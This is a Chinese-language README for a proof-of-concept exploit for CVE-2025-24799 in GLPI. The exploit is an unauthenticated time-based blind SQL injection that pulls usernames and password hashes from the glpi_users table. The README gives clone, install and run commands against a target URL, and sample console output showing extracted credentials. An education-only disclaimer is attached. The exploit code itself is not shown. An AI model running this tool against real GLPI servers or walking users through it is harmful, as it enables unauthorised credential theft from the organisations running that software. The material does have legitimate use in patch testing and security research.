CVE-2025-24799 是一个针对 GLPI 的概念验证(PoC)利用工具。
该工具演示了 未认证 SQL 注入(基于时间的盲注),用于提取用户凭据。
免责声明: 此 PoC 仅供教育目的使用。请勿在未经许可的系统上使用。
glpi_users 表以及所需列(name 和 password)git clone https://github.com/Rosemary1337/CVE-2025-24799.git
cd CVE-2025-24799
pip install -r requirements.txt
依赖项:
requests、colorama、beautifulsoup4
python3 main.py -u <TARGET_URL>
python3 main.py -u http://target.com/index.php/ajax
| 标志 | 描述 | 必需 | 默认值 |
|---|---|---|---|
-u, --url | 目标 URL | 是 | - |
控制台会显示:
[•][✔][✖][i]示例:
[•] Exploiting CVE-2025-24799...
[✔] Table 'glpi_users' found.
[✔] Required columns verified.
[i] Starting credential extraction...
[+] Credential 1: admin:5f4dcc3b5aa765d61d8327deb882cf99
[+] Credential 2: user:123456
[*] Extraction complete.
我是一名活跃的开发者,热衷于构建工具并分享知识。你可以通过以下方式联系我: